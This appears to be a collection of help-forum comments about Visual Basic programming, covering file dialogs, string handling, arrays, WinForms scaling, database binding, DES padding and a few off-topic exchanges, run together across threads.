Just scanning the manual you might look into GetField, You could probably come up with a loop using getfield and passing the comma as the delimiter to retrieve each group of numbers. This is flawed but here is a mock-up of what I would try Dim returnString As String 'A string to test Dim commas As Integer returnString = "1234, 2345, 3456" 'Find Out How Many Commas We Have (this could just be a function to pass your value into and return a number) For x = 1 To Len(returnString) If Mid(returnString, x, 1) = "," Then commas = commas + 1 End If Next x 'Now that we have the number of commas, we should be able to loop through an increment the position 'for the GetField method Dim returnValue As String For x = 1 To commas returnValue = GetField(returnString, x, ",") 'Store your returnValue into your combobox Next The problem is I don't know the indexing for GetField so this would only find 2 commas and pull 2 results. The for loop either needs to start at 0 or loop to commas + 1 but I don't have a way to test it as GetField isn't a part of VBA. A second alternative is to use Mid like I did to find the commas. Looking at that block of code, I step through the string 1 character at a time and check to see if it's a comma. At this point you know the position of the comma so you could literally find the comma and use Mid again to pull the text up to that length. This gets a little hairy as you would need to know not only the start position, but either the length or the position of the next comma or end of string to know what length to pull. It's all quite possible but will take some thought. Lastly, VisualBasic.Net handles Office Automation quite easily so you might look into trying to re-write some of this using a newer, more robust language as it sounds like you're just pulling data from a spreadsheet and making a gui for it. But I don't have all the facts to form this as a viable solution.
There is no built-in way to clone WinForms controls. You could do it with reflection, but that would probably end up taking more lines of code than just doing it by hand.
 you could iterate the controls properties that are not static using reflection. There is also the possibility of using serialization to clone the object. 
The usual serialization tricks probably won't work as there are lots of fields/properties that can't or shouldn't be serialized and cloned, like the underlying window handle, other control references etc.
Make it indexed and use `Load oLabel(x)` where x is a new index
I'm sorry, what?
`DirectoryInfo(@"../..");` means "2 folders up from the current folder", which would be relative to the default build folder, which is the project folder. change it to C:\ or the GUID for "this pc" (you'll have to google that one)
Yeah, I'm starting to realize I bit off wayyy more than I can chew... How would I change it to "C:\"? I tried a few different ways but none were correct Dim info As New DirectoryInfo("C:\") Dim info As New DirectoryInfo(C:\) Dim info As New "C:\" Dim info As New C:\
When you create the label on the form, set its index property to 0. Now you can load multiple of it `Load oLabel(1)` Load oLabel(2) etc
I have a professional version 2012 that I paid 800 bucks for. It was for a job and I billed it out to the client. I was going to use express but when I looked there was something I needed from the pro version. Does 2017 need windows 10? I wouldn't doubt that MS would do something like that and i'm just not a fan of 10.
That's not a thing anymore in VB.NET.
Why would you not just use the standard OpenFileDialog component to bring up a file open window for the user to pick the file they want? It has the standard search box in it at the top if they want to do a search, it works pretty much just like your standard explorer window.
Well....because I had no idea this existed... (I've barely used VBA before and this is the first time I've ever used just VB, tried to make a .Net file, or seen Visual Studio). So I just wasted hours trying to make my own thing...but thanks for showing me this so that I don't keep wasting time!
Hey, so I'm trying to play around with the [example code provided here](https://msdn.microsoft.com/en-us/library/system.windows.forms.openfiledialog(v=vs.110).aspx). Considering the fact that this is an "open file dialog" window, I'm assuming it is meant to be used to "open" the file. Is there some way to change it so that when "open" is clicked, what really happens is the selected file's path is copied into a variable?
It doesn't actually open a file. The name is just called that because it is the component used to select a file (or files) from the file system. You are 100% in charge of actually opening or doing anything with the file once that dialog closes. Only the path/name of the file is available to you in a string variable to then use further in your program. So for example: Using myOFD As New OpenFileDialog myOFD.InitialDirectory = "C:\" myOFD.Title = "Select a file Burton_Gustice" If myOFD.ShowDialog = Windows.Forms.DialogResult.OK Then textbox1.text = myOFD.FileName Else 'USER HIT CANCEL AND DIDN'T PICK ANYTHING End If End Using 
Perfect! This is exactly what I have spent the past 2 days trying to figure out how to do, all done in 9 lines... The only thing I had to change was I removed "Windows.Forms.", so the line read: If myOFD.ShowDialog = DialogResult.OK then Thanks for this!!
Thank you so much for this /u/CharlieMay The application this code is for pulls from a spreadsheet but also executes commands on our terminal emulator. I will absolutely take a look at this and see what I can achieve. Thank you all for your input, I really do appreciate it. If I can get this to work I will be sure to report back and share my results. I wish I could be more specific with what I'm using this for and what we monitor, but sadly I can't. 
I never thought about that. I use it so much for custom classes that I never took into account issues a control would bring.
&gt; 2012 🤢 And no, I use 2017 on my windows 8.1 vm fine.
thanks so much for the help, i tried the "=" method and it works like a charm, you just saved a project! Thanks again
you can use the JS DOM to get elements by type and filter by class and al sorts of things, but that's a javascript Q, not a VB one. it's actually far easier to do this in JS, especial when using a framework. if you need to it in pure VB on a HTML string, you have to parse the HTML. there are some libraries to help with that, I don't have a specific recommendation, mostly because I avoid it. it's a pain, and error prone. a better option to work out an API with the target shop, or figure out if they already have one you can poke at.
how would you go about parsing for the specific sections mentioned? I dont really have much experience with manipulating strings or HTML especially with vb.net
I would research the various html parsing libraries.
Well that's something at least.
Html agility pack worked pretty well last time I used it.
Are you receiving any errors? One thing I don't see here is where you're resetting j back to 0 This would cause j &gt; TxtAmountLaps after the first Attendee Loop but I'm not sure why you wouldn't be getting an out of bounds condition to come up. let's say you have 4 attendees with 2 laps each when the first 2 are done, you increment i but j is still = 1 (0, 1) so when you hit the j=j+1, it would go outside the bounds of the array. 
yep, that did it =) It's always in the small things. Been trying to learn VB, but sometimes hard to find the easiest thing. Still had to change some other things in the code aswell since solving this issue created 2 more. But I'm happy to say it now works perfectly. Cheers
:)
VB has the ability to parse text by downloading the text.
Just FYI... You can use += to accomplish the same thing. &gt; i = i + 1 can become i += 1
Will take a look thank you
Mono had an old, incomplete version of VB. And you need Mono if you want to port WinForms to Linux without a total rewrite of the UI. In theory you can compile on a Windows box, then run it on Linux+Mono if it passes the Mono Migration Analyzer. But I can't say I've ever tried it. https://stackoverflow.com/questions/2673903/run-vb-net-on-mono Good luck, 
Think xamarin would do it? If not, I guess I've seen mono games on linux that felt pretty native.
I am using core 2.0 to build apps for all platforms in vb.net, they are web apps that we are hosting in a custom browser but it works.
Gonna see what mono and/or xamarin make happen. I'm trying to get mac/linux support.
Xamarin is Mono on iOS/Android. 
I thought it was a closed source version of mono with more features. Just read about it, just different IDEs mostly. I was thinking since MS had bought them it might work better.
We're in a period of flux. Still waiting to see Mono and .net core converge 
I'm still incredibly psyched that I don't have to try and learn a new language.
We support Android, IOS, Win, Mac and Linux with Core 2
You could build your own color picker. It's just a bunch of colored boxes that you can click on.
Yeah, that was the obvious solution. I was just wondering if there's a way to avoid manually placing 50+ colors and labels. There are a lot of named colors. 
I think you could use Reflection (if I'm understanding you correctly) For example, create a new form with a FlowLayoutPanel and a button YOU MUST HAVE `Imports System.Reflection` at the very top of your code window. In the button Code: Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click FlowLayoutPanel1.AutoScroll = True Dim Names As String() = GetColorNames() For Each c As String In Names Dim lbl As New Label lbl.ForeColor = System.Drawing.Color.FromName(c) lbl.Text = c lbl.Font = New Font(lbl.Font, FontStyle.Bold) FlowLayoutPanel1.Controls.Add(lbl) Next End Sub Plus add the following Function (found through a search) Public Function GetColorNames() As String() Dim list1 As New List(Of String) Dim infoArray1 As PropertyInfo() = GetType(Color).GetProperties Dim info1 As PropertyInfo For Each info1 In infoArray1 Dim info2 As MethodInfo = info1.GetGetMethod 'Because the static colors are read only... we can simply check their get method If ((Not info2 Is Nothing) AndAlso info2.IsStatic) Then list1.Add(info1.Name) End If Next Return list1.ToArray End Function This will give you an string array of color names, then you can set the color of the object (like I did with lbl.ForeColor) using the .FromName() method. You could also store the color in the tag so that if the user clicks on it, you can get that information to pass along to something else as needed. 
Thank you. That's exactly what I needed. Now, I just have to add a click even to each color and return them as a user selection. 
Functions are separate from Subs but you can call the function from the sub and use the return value inside the sub. So let's say you need the AGI, you've already assigned Gross and Retire in your loop so you would do something like Dim AGI As String = calcAGI(Gross, Retire) This would pass the values of Gross and Retire into the function, the function would use those values to perform the calculation and then return that result back to you (in this case as a string) So let's say that Gross is 100000 and retire is 60000 the call to calcAGI would return AGI:40000 so therefore, in your calling sub, AGI is now "AGI:40000". It might help to see the pseudocode you're working off of.
Ah, thanks. I wound up working through it overnight, and I came up with the solution you just offered. 
One was is you can trick the OFD by giving it a filename (bogus or otherwise) and return only the path back. This way, the user can stop on selecting a folder and the path is returned. If they by chance happen to click on a filename, it will still only return the path. Here's an example. It's not a perfect solution but considering the feel compared to using the folderbrowserdialog, it's in my opinion a nicer looking method. Create the following function Private Function getFolder() As String Dim openFileDialog1 As OpenFileDialog = New OpenFileDialog 'Here we set the filename, it doesn't matter what is here or 'if they accidentally click on a file, only the path is returned openFileDialog1.FileName = "No Need To Click A File" openFileDialog1.CheckPathExists = True openFileDialog1.ShowReadOnly = False openFileDialog1.ReadOnlyChecked = True openFileDialog1.CheckFileExists = False openFileDialog1.ValidateNames = False 'if they click OK If openFileDialog1.ShowDialog = DialogResult.OK Then Return System.IO.Path.GetDirectoryName(openFileDialog1.FileName) + "\" End If Return "" End Function This can be use with something like: Dim myPath as string = getFolder This will open the OpenFileDialog but not force the user to select a file since the filename is filled in. Again, not perfect but all it's really doing is turning off ValidateNames and setting a bogus filename then just returning the path portion of the filename. 
The link you have says to also add this `myofd.FileName = "Folder Selection.";`
Yeah. I had that in there but all it did was put "Folder Selection" in the text box at the bottom of the form. That is, the form would open and the bottom would say, "File name: [ Folder Selection ]", with the brackets representing the text box at the bottom
Awesome. Yeah, it's kind of a janky way to use this but honestly I'd much rather this than have to deal with FBD. So thanks!!!
Don't you want the FolderBrowserDialog? Using myFBD As New FolderBrowserDialog myFBD.RootFolder = Environment.SpecialFolder.MyComputer If myFBD.ShowDialog = DialogResult.OK Then txtFolder.Text = myFBD.SelectedPath Else txtFolder.Text = "" End If End Using 
`OpenFileDialog` does not expose the necessary configuration to do that, and there is no simple way of changing that. The `CommonOpenFileDialog` from the WindowsAPICodePack exposes a more flexible version of that dialog, which can be configured to select folders without any hackish workarounds. You can find the WindowsAPICodePack library on Nuget.
Read the first two sentences of the post.
I did see this mentioned around in my trying to find a solution. I was wondering though: if I have to download the WindowsAPICodePack in order to use CommonOpenFileDialog, does that mean everyone on my team that I'm building this thing with will have to download it as well? And does any person who uses the tool in the future also have to download the pack?
If you reference a NuGet package, anyone working on the same project files will be able to automatically download it. For users you will have to distribute the DLL files together with your executable.
If I have this right you have a collection of a custom class object that contain Name, E-Mail, Phone and Notes. The goal right now is to edit a given item in the collection. The easiest way to do this is to instantiate a new empty copy of the class. Copy the data from the original, add the new item to the collection then remove the old one. you will need to track what state your form is in, either add or edit in your case. I would add a property to the form called state. So on your second form create a new function that is called Edit or something similar public sub Edit(RecordToEdit as objectType) ' save the RecordToEdit information in a global copy of the object ' here you would write code that would populate the form ' set the property on the form to edit ' change title on your save button to "update" end sub on your save/update button; On button click if form.state = edit then ' add new item to collection using form values ' remove original record using the global copy of the information saved earlier. end if ' close the form. end Now as secondary method you can databind your custom collection to a datagrid and a edit form. This would allow the updating of the items in your collection using the built in tools. I would love to see your code so we can brainstorm it and come up with an article for the sub on collections of objects. 
Thank you for your help u/Bonejob I'd like to note that we haven't yet learned about the form.state method, but we did learn about the datagrid in the last chapter. I've copied my code [here](https://codeshare.io/aljmz8)
Edit: I figured out the problem :D I left the Value Member empty for the list box that is linked to the database. Just doing that didn't fix the problem entirely because when I ran the program it changed some of the names in the list box to integers (idk why, maybe the index?). To fix that I changed the Selected Value to none and it works now! :D 
2017 can run on Windows 7 just fine.
 Cool, i'll grab a copy.
Sorry man, go someplace else. Not only did you not show us the work you have done you don't give me any confidence you even tried. If you are finding this difficult then I would suggest picking up a textbook.
I'm sorry. I started working on it and made some progress. I will have the code if I get stuck.
Where are you having problems?
I have to calculate the number of nights stayed with the type of site a person will be using. Here's the calculate button which is a button - Private Sub Button1_Click(sender As Object, e As EventArgs) Handles btnCalculate.Click Dim subtotal As Decimal subtotal = (comSite * txtNights) lblSubtotal.Visible = True txtSubtotal.Visible = True lblTaxes.Visible = True txtTaxes.Visible = True lblFinalTotal.Visible = True txtFinalTotal.Visible = True btnMealPlan.Visible = True btnClear.Visible = True btnExit.Visible = True End Sub Here's the number of nights stayed which is a text box - Private Sub txtNights_TextChanged(sender As Object, e As EventArgs) Handles txtNights.TextChanged grpDiscounts.Visible = True radAAA.Visible = True radMilitary.Visible = True radNone.Visible = True End Sub Here's the type of site which is a combo box - Private Sub comSite_SelectedIndexChanged(sender As Object, e As EventArgs) Handles comSite.SelectedIndexChanged Dim RV, Tent, Cabin As Decimal RV = 40D Tent = 25D Cabin = 60D txtNights.Visible = True lblNights.Visible = True End Sub Sorry if this is really jumbled, I'm new to this type of stuff.
Ok great. Now where are you stuck?
I'm not sure how to assign a monetary value to the sites. Once someone determines what site and how long they will stay, how do I calculate that with the button?
You're on the right track but instead of none, you would probably want to eliminate everything that isn't male or female (and remove the case sensitivity). Look into Select Case or If/Then/Else for assistance. BTW, it usually helps if you post some of your code so people can get a better understanding of where you're at.
I'd use **DataGridView** for this instead of a multiline Textbox. Public Class Form1 Dim DS As New DataSet Dim T As DataTable = DS.Tables.Add("MyTable") Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load T.Columns.Add("Qty", GetType(Integer)) T.Columns.Add("Product", GetType(String)) DataGridView1.DataSource = T End Sub Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click T.Rows.Add({TB_Qty.Text, TB_Product.Text}) End Sub End Class 
There are a lot of issues when comparing strings. For example: "Male" = "Male" **true** "Male" = "male" **false** "MALE" = "male" **false** And so on and so forth. It is something you will need to account for. I usually convert both sides of the comparison to upper or lower so the cases are all the same.
[TextBox.Lines](https://msdn.microsoft.com/en-us/library/system.windows.forms.textboxbase.lines\(v=vs.110\).aspx?cs-save-lang=1&amp;cs-lang=vb#code-snippet-1) is a read-only array of strings, so you just have to iterate through that.
You can use String.Compare with the ignoreCase parameter set to true. If the return is &gt; -1 then the compare succeeded. &gt; String.Compare("Male", "MALE", False), Returns -1 &gt; String.Compare("Male", "MALE", True), Returns 0
Thanks for that. I still learn something new every day.
Thank for your response, sounds like a good idea. How would I then pull out data from each of the rows to later input it into my Microsoft access database? I know how to input it into the database I just don’t know how to set each line from the datagridview as a variable of some sort. Thanks :D
Easier than that...once you have the access DB, create a DataSet to it at design time and Dim DS as new &lt;AccessDataSet&gt; and your done.
You could compare the input in all lowercase to avoid (MaLE or maLe) So if you Compare "MALE".ToLower() with "male" : true Compare "maLE".ToLower() with "male" : true This would make your inputs non-case sensitive. Also instead of If/Else/ElseIf statements look into Select Case, it makes cleaner code.
How would you iterate through it? Can you explain what it means and how to do it? Thank you!!
Thanks for the response, how did I add my access database to the dataset I just created
To iterate through an array means you step through each element in the array and run the same piece of code on each element. It's often a "for loop". In the link I provided, there is an example that shows how to do that, but I'll write one here so I can explain every part with comments: Public Sub DoStuff() ' Create a local array of strings to store the textbox lines ' You could access the textbox itself but it's nice to have a local copy Dim Lines() As String ' Copy the textbox lines to your local copy Lines = MyTextBox.Lines ' Write a loop to iterate through the array ' We'll use the GetLowerBound() and GetUpperBound() methods as our start and end points ' - We pass zero as a parameter to those because it's a one-dimensional array For i As Integer = Lines.GetLowerBound(0) To Lines.GetUpperBound(0) ' Do something useful with each element, like add it to a database table MsgBox(Lines(i)) Next i End Sub
[removed]
Thanks heaps!! So pretty much what it's doing is assigning a number to each line of text in the textbox correct? What do I call each of the required lines when inputting into the database, as in how would I write it out? Would it be something like: For each row that is filled 0 to number of rows filled Then assign the numbers as parameters for my database Sorry I'm quite new to complex vb programming as this is my first major project, thanks heaps!!
yes, loops. and arrays. maybe of "item" objects. best would to be use a database. you're basically making a database anyway, might as well use one. 
I agree that a database would probably be best, but I don't have any experience incorporating databases into visual basic yet and I have to have this project done by tomorrow. I considered using arrays as well but wasn't sure how to make it work how I want it to. Do you have an example of the code you would use?
Yeah, our array "Lines" is defined as: Dim Lines() As String We define it with empty bracket () because we don't want to specify the size of the array. At this point, Lines is just a placeholder with zero size. Once we assign MyTextBox.Lines to our Lines variable, it now has size (even if the size is zero) and presumably contains some stuff. Just to make sure, we ask the GetLowerBound() and GetUpperBound() methods. What will usually happen is GetLowerBound() will return zero because we start counting with zero instead of one. If we have, say, 10 lines in the array, the GetUpperBound() method will return the value 9. So the 10 lines are numbered 0, 1, 2, 3, 4, 5, 6, 7, 8, 9. You can access the individual elements in an array by these numbers -- just make sure they exist and you don't go too far low or high or it'll break with an error. Assuming there are 10 lines in your MyTextBox, we could do this: MsgBox(Lines(0)) MsgBox(Lines(1)) MsgBox(Lines(2)) MsgBox(Lines(3)) MsgBox(Lines(4)) MsgBox(Lines(5)) MsgBox(Lines(6)) MsgBox(Lines(7)) MsgBox(Lines(8)) MsgBox(Lines(9)) But we aren't sure there will always be exactly 10 lines, so we write a loop that goes from the first element to the last element in the array. As it loops, it assigns an integer value to the variable i (the "for i as Integer =" part). We can replace our Lines(0), Lines(1), etc. with Lines(i) instead, since i will hold the value 0 when we first loop, then 1, then 2, until we hit the end of the array. Each time, it is accessing the next element in the array. You'd probably just want to write a method that inserts a string into your database and pass Lines(i) to that method. Good luck and have fun!
Thanks heaps friend! Appreciate it :D
Double-click on the dataset in solution explorer, then right-click in the dataset designer and Add TableAdapter. you will go through a dialogue where you can select the DB.
ZeroMQ is an option. 
What you describe is a simple TCP/IP connection.
I'd make a struct or an object and then make an array of that.
Since you're describing doing this in Word, I'm guessing you'd be using VBA, so searching for solutions that use VBA will probably give you better results. You might also try cross posting to /r/vba 
It's the same as the client / server variants you see, just that the server component would be embedded in the client so that it can act as either a server, or a client. 
The one issue is getting through your friend's firewall,.. and your friend getting through yours if he initiates the connection. You have to write your code to use a port that each of you can enter into your port-forwarding of your routers. tldr: yes.
Create a structure named Item with 2 properties: Name and Cost Then have a List of Items (or array) and just use loops to add all your items. &lt;--- You could have the items in a text file and just import them in
run the refresh code on remove. you'll probably want to move that to its own function.
Yes but if I refresh it all when you only remove one item from the cart, that kind of wouldn't work. I only want it to remove the selected item.
Like u/chrwei alluded to, separate your refresh into a couple of methods. Maybe have a method that just updates the totals based on what is in the cart. Then you can call it from the Remove and the Refresh.
It's not ideal but you could have a loop for looping through the listbox and adding to the total depending on the item. dblSubtotal = 0D For Each item As String In lstCart.Items If item = "book name" Then dblSubtotal += some_amount End If .... Next
then add code to figure out the value of the item you're removing and subtract it. there's no magic bullet here.
I don't think it really matters if you grow it or shrink it. might matter if you have objects with raster GUI elements, but everything else should scale either way personally, I design for the smallest target and don't grow or shrink. that way someone with a 27" screen doesn't get a weird experience.
This is a good plan. I do the Same. I have had one instance where I have had to work on the forms a bit when the users switched to 4k. Those small forms look tiny on 4k. Never had any luck with font scaling either.
OK I need more information on what you are trying to do.
SO what do I do though? Just check autosize on the form itself or do I check autosize on all the controls on the form? Do i need to check off AutoScaleMode to DPI or FONT or none? None of the controls on the screens are complex, they are all just simple buttons, labels, text, panels.
It was this (among other) reason that prompted me to move to WPF, as I found that easier to handle different resolutions and screen configurations. For Forms, you can use controls such as Panel or TableLayoutPanel to organize your UI within the form to have more control over how the layout will look at different resolutions. You can also do tricks like set the form's maximum/minimum size to keep it reasonable.
I would flip the form.autoscalemode to true. https://docs.microsoft.com/en-us/dotnet/framework/winforms/automatic-scaling-in-windows-forms Please see the second section "Current support for automatic scaling" for details.
why not just try it and see what it does and if you like the effect you're done? 
I personally find that embedding everything in a tablelayoutpanel works really well for me. Create the panel and grid to best fit your needs, place the controls in it and dock fill, and you can more or less forget about it.
It reads in values from the text files then finds the data and displays it in text boxes. One text file has a list of flavors of milk shakes and the other is a list of numbers that represent sales. When I run it nothing is displayed in the text boxes when I hit the button. I don't understand what's going on really. 
I tried various combos. I made a screen with 2 buttons, a button at each corner diagonally I made the screen 2000 by 1000, bigger than the monitor I am using which is set to 1366 x 768 No matter what I do the form does not shrink down to fit the screen. Any ideas?
the form isn't go to shrink itself. if you maximize it'll scale, or if you add code detect the screen size and set an alternate default
well at this point you Flavour and Sales variables store the information. The function SalesInformation fills the form. It seems to be loading a listbox with the top 5 sales. 1) run the SalesInformation in the Evaluate button as the last function. This will give you somthing in the list box. 2) Is the listbox supposed to have the flavours as well, or just the values? 3) This linq looks odd to me Dim topFiveQuery = From top In topFive Order By top Descending Select top 4) if this is how they are teaching in school give me the fucking name of the school so I can call them and give them shit.
Auto Size / Font Scaling is for handling users that have different font sizes. (anything that's not 100 percent). That feature causes the controls to resize (and the forms if needed) to handle the larger font size. It works in most cases, but still needs some testing, and possible adjustments. Screen resolution is generally handled by using a combination of anchors, docking, and container controls (TableLayoutPanel, FlowLayoutPanel, etc). 
I've always seen padding ([oracle,ms]SQL, VB) as spaces (0x20), thus mostly why the TRIM() functions exist
https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.paddingmode.pkcs7 It sounds like you're doing this to compatibility/interoperability reasons so you may not have a choice, but I should note that the encryption code you linked is both outdated (DES has been broken for decades) and badly implemented (no key derivation function).
Post encryption, when I take the encrypted value given FROM the vb encryptor and then in our decryptor I iterate over each letter and its association unicode decimal value, so far I've found those 3 different pad characters. Once I know the pad character used and I re-encrypt using my own encryptor and that particular pad character everything works just fine.
If I understand what that document says, it sounds like its the character that represents the amount of padding required... 
Byte, not character, but yes. 
That was it, I feel like an idiot for not putting it all together. It makes sense now that I look at all of my test strings. I hadn't stopped and piece together the fact that all my test strings, the pad characters all line up with the number of paddings needed to reach a multiple of 8. Thanks, i know its outdated but they're not willing to change anything (we've tried).
tweq nailed it. The random value is the byte value of the number of paddings needed to reach a multiple of X. So if it needed 7 characters to make it to 16, byte 7 is used, 4 characters, byte 4 ..etc.
There is another case, mind you: if the data is already a multiple of 8, it is padded to the next multiple of 8 (so "xxxxxxxx" -&gt; "xxxxxxxx88888888").
Yea, I came across that oddity a while back when testing random lengths.
How did you find the default padding? I was looking at the docs for DESCryptoServiceProvider and wasn't seeing much about padding.
Yeah, the docs are unfortunately surprisingly sparse on this. I just had a look at [the reference source](https://referencesource.microsoft.com/#mscorlib/system/security/cryptography/symmetricalgorithm.cs,31) as well as checked what the `Padding` property of a newly created `DESCryptoServiceProvider` was at runtime.
So I went to a tutoring session today to get some questions answered about this program and here is what I have. The program runs and displays the proper data, but the formatting for the list box is all weird, the spaces don't add up. I do have more final question though. How would I write one more loop so that if the text files with the sales information in them have duplicate numbers in it, it will display both shake flavors? For example: chocolate 172 vanilla 172 the code that I wrote is this: Public Class frmShakeSales Private Sub btnEvaluate_Click(sender As Object, e As EventArgs) Handles btnEvaluate.Click Dim Count As Integer Dim flavor() As String = IO.File.ReadAllLines("flavors.txt") 'read in the flavor text file. Dim sales() As String = IO.File.ReadAllLines("sales.txt") 'read in the sales text file. Dim flavorSales(sales.Count - 1) As Integer 'set an array to read in sales to numeric. For i As Integer = 0 To sales.Count - 1 flavorSales(i) = CInt(sales(i)) Next SalesInformation(flavorSales) lstOutput.Items.Add("The Top 5 Shake Flavors for the Month") lstOutput.Items.Add(" ") For i As Integer = 0 To flavorSales.Count - 1 For j As Integer = 0 To flavorSales.Count - 1 If sales(j) = flavorSales.Max And Count &lt; 5 Then lstOutput.Items.Add(flavor(j) &amp; " " &amp; flavorSales(j)) flavorSales(j) = 0 Count = Count + 1 End If Next Next End Sub Sub SalesInformation(flavorSales() As Integer) Dim aboveAvg As Double For i As Integer = 0 To flavorSales.Count - 1 If flavorSales(i) &gt; flavorSales.Average Then aboveAvg = aboveAvg + 1 End If Next txtHighest.Text = flavorSales.Max.ToString("N0") 'find the maximum value txtLeast.Text = flavorSales.Min.ToString("N0") 'find the minimum value txtAverage.Text = flavorSales.Average.ToString("N0") 'find the average txtPercentAbove.Text = FormatPercent(aboveAvg / flavorSales.Count) txtTotal.Text = flavorSales.Sum.ToString("N0") 'find the sum of all the values. End Sub Private Sub btnClear_Click(sender As Object, e As EventArgs) Handles btnClear.Click 'to Clear all input/output txtHighest.Clear() txtLeast.Clear() txtAverage.Clear() txtPercentAbove.Clear() txtTotal.Clear() lstOutput.Items.Clear() End Sub Private Sub btnQuit_Click(sender As Object, e As EventArgs) Handles btnQuit.Click 'This exits the program. Dim answer As String answer = InputBox("Do you want to quit? Yes/No", "Exit?") If answer.ToUpper = "YES" Then Me.Close() End If End Sub End Class Thank you for the help also! 
I’m 90% sure that there is no commercial games or any popular titles. Stick with C++ most will be mad e with C.
OK, thanks! =)
Assuming we're talking about VB.NET, it's largely equivalent and compatible to C# (biggest exception being a lack of unsafe pointers), and thus any .NET game and graphics libraries as well as pure DirectX/OpenGL should work. But even though it's possible, I don't know if any commercially successful developers have actually done that instead of just using the more popular C#. I assume it should also be possible to use VB.NET assemblies in Unity games, but it's probably not officially supported by the tools/IDE.
From someone that's on the same path, I'd recommend learning c# and unity. I only knew vb.Net a few months ago and looked into Xna, but the support isn't there anymore and it looks like everything is moving to c#. Picking up c# from VB.Net isn't too bad. 
OK, thanks! =)
OK, thanks! =)
I started with VB 2.0 and worked with all versions including .NET before moving on to C#. So I am talking 15+ years with VB. VB is not as f'in horrid as you'll hear, it's that it was easy to pick up so lots of people with no training and/or talent wrote bad programs in VB. I say all that to push you to taking up C#, since you're already learning c++ the syntax will be similar, and (here's my real point) Unity3D uses c#, and Unreal uses c++, so you'll have two options for creating games. Hope that helps.
It's possible, but not likely, that some XNA games were built with VB.NET (there was support late in the life cycle of XNA). It's also possible that some games built around MonoGame, or other .NET compatible engines, could be based on VB.NET, but again unlikely. It's far more likely that games using those engines were built with C#, and as already pointed out, XNA is end of live. Unity uses an older version of C# for it's scripting engine, so that's a solid choice if you want to stick with .NET.
What you want to do is use an API. Something like this: https://www.dictionaryapi.com/ altho just do a search for VB.net Dictionary API. You would need access to the net, and you have to watch licencing but that is how I would do it.
Visual Basic has a built in spellcheck class which would do what you want. https://msdn.microsoft.com/en-us/library/system.windows.controls.spellcheck.aspx 
 Dim filename as string = "C:\wordlist.txt" Dim words() As String = IO.File.ReadAllLines(filename) If Array.contains(words, myWord) Then ' Add to array End If Not sure if there's an easier way to do it. But this is how I did it when I had to check if procedurally-generated text was not already a real word.
What you are referring to is "Post-quantum Cryptography". Lattice-based cryptography has two implementations NTRU, and BLISS. Another type I have been following is Multivariate cryptography and its implementation Rainbow. AES 256 is not even close to stop quantum processing. Most new algorithms are using 124 KB (Note KB not B) Public and Private keys. The real problem you are going to run into is that VB6 math functions are slow as shit. I wrote a DLL for vb6 20 years ago in MASM to speed up math functions. Unfortunately it has been lost to time. I would suggest if you are going to do what you are asking you will need to start in C++ and link the math.h library through a DLL so that you can access high speed math.
AES is a symmetric algorithm, it doesn't use public keys and key sizes can't be compared between symmetric and public-key algorithms. Symmetric algorithms aren't nearly as susceptible to quantum computers as things like RSA. They're still massively weakened, but that's easily fixed by using large enough keys (which AES-256 does as far as I know). But I agree, VB6 is not a practical language to write cutting edge cryptographic software in (IMO it's not a good language to write *anything* in at this point...). And I don't mean to be rude, but anyone who uses the sentence "scalable quantum-proof blockchain for Windows with async mswinsck.ocx arrays" is probably not someone who has the necessary expertise to design cryptographic systems.
IIRC The Web element is based off IE.
Yes, because when you start the request it will post what the "User Agent" is. You can get around this by modifying the user agent when calling the navigate method. webBrowser1.Navigate ("http://www.google.com", "_self" , null, "User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"); Will make it look like chrome on the request. Here is a list of known browser agents http://www.useragentstring.com/pages/useragentstring.php Some sites are sneaky and will actually check to see if the browser supports ActiveX controls. in asp.net you call request.browser.ActiveXControls and it will return true or false. So certain sites (Amazon) will still detect IE even if you change the user agent. Lastly stop using the built in browser control and switch to CerfSharp it is a chromium based browser control for .Net. https://github.com/cefsharp/CefSharp
&gt; And I don't mean to be rude, but anyone who uses the sentence "scalable quantum-proof blockchain for Windows with async mswinsck.ocx arrays" is probably not someone who has the necessary expertise to design cryptographic systems. So a arrays of a 3rd party .dll to handle the math and arrays of mswinsck being controlled by timer arrays couldn't result in a fast distributed ledger? Adorable, unfounded elitism.
Thanks for your response. With network programming I'm much more comfortable in VB6 and can write complex, stable software in it. A 3rd party .dll handling math could be the answer. VB6 isn't low level, but all that matters is what is sent to the CPU in machine code. Async multisocket in nodes running on fat up/down bandwidth pipes and serous hardware could probably beat most distributed ledgers in speed. 
My apologies, I didn't realize I was talking to an expert. Maybe you could write an asynchronous GUI interface in Visual Basic to track the immutable IoT consensus?
&gt; I'm much more comfortable in VB6 Username checks out
&gt; AES 256 is not even close to stop quantum processing. Most new algorithms are using 124 KB (Note KB not B) Public and Private keys Apples and oranges. AES 256 is perfectly fine. 
Cold man, just cold:)
You will need a thread that spawns new image instances in random occasions.the image instance has its own code behind that controls click function (when you click it) and maybe some movement functionality - speed, direction etc. 
Hi mate, thanks for the help, got started on this a few hours ago I'm trying to add new picture boxes each timer tick for the balloons spawning, but it deletes the previous image before adding the next one on the next tick? Any advice? my code: Private Sub tmrSpawn_Tick(sender As Object, e As EventArgs) Handles tmrSpawn.Tick Dim fs As System.IO.FileStream fs = New System.IO.FileStream("C:\Users\Reece\Desktop\School Work Year 12\VB Projects\PopGame.vb\balloon.png", IO.FileMode.Open, IO.FileAccess.Read) NewBalloon.Image = System.Drawing.Image.FromStream(fs) fs.Close() NewBalloon.Location = New Point(((400 - 100 + 1) * Rnd() + 100), 0) NewBalloon.Size = New Size(35, 15) NewBalloon.BackColor = Color.Transparent NewBalloon.SizeMode = PictureBoxSizeMode.StretchImage Controls.Add(NewBalloon) End Sub
I'd recommend putting code on GitHub, or providing some screenshots or details. I am intrigued a little bit (because I have some assistant-ish software in VB as well), but not enough to download and unpack a RAR.
Since I don't see where you are creating "NewBalloon" I am assuming this is a single control added at design time (as opposed to code) If my assumption is true, you need to create a new control in your code. ie: Dim newBalloon as new Image() newBallon.Image = (etc etc)
This is the first application I've 'published,' and I'm not familiar with GitHub. I created a GitHub account, but I'm struggling with adding the solution/repository. I tried following [this](https://stackoverflow.com/questions/19982053/how-do-i-add-an-existing-solution-to-github-from-visual-studio-2013) tutorial I found on StackOverflow, but got stuck on the second step 4. Any tips? Thanks!
